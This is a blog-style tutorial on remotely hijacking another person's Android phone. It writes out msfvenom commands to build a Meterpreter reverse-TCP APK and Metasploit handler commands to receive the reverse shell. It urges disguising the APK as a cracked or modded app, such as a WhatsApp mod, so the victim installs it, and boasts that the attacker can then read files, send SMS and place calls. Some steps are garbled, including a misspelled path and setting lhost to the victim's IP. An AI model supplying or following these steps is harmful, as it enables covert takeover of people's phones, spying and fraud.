

Remotely Control Any Android Over The Internet (Without Physical Access)

Hii guy's everyone ask me a single question every time "How to hack anyone android over the internet or without touch?" so today am going to teach you how we can access anyone android over the internet without physical access or without touching victim device. So let's get started.


  1. Android (No Root or Root both works)
  2. Termux
  3. Learn Basic of Termux (Visit YouTube channel for learn)
  4. Metasploit Framework in Termux (If not have then don't wary just check this post of installtion of Metasploit Framework)

Open your Termux and type the following commands (You can also copy paste commands):-

Generating Payload :-

$ cd  /storage/emualted/o

$ msfconsole (For Start Metasploit Framework)

$ msfvenom -p android/meterpreter/reverse_tcp lhost=[Paste victim Ip here] lport=[Paste local port or 4444] R> hack.apk

Wait until apk is generated

Make victim to install this apk in their device but "Question is why victim install it". Now day's everybody know that if he/she install an entrusted app then anyone can easily hack their device. So this time you need a reverse engineer or you have skills to hide this apk in an cracked or mod like whatsapp GB or an paid app for free then victim decide to install it "Got it ;p". Once victim install it then "wHy sO SeRioUs" .  It's time to Exploit the payload.

Exploitation :-

use multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost [paste victim Ip]

$ set lport [type local port or 4444]

$ exploit

Now type help command for see controllers

You can remotely control victim device and also read and change the files, Send SMS/Messages, Make Calls with their device etc. Like any spy application(Mobile Tracker) we discussed in previous post.

I hop this information is helpful for you and if you have any doubt than feel free to comment down and give your suggestion for improve our website or post quality. Subscribe to YouTube channel for videos tutorials.

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Mohit Saran (Hacker's King)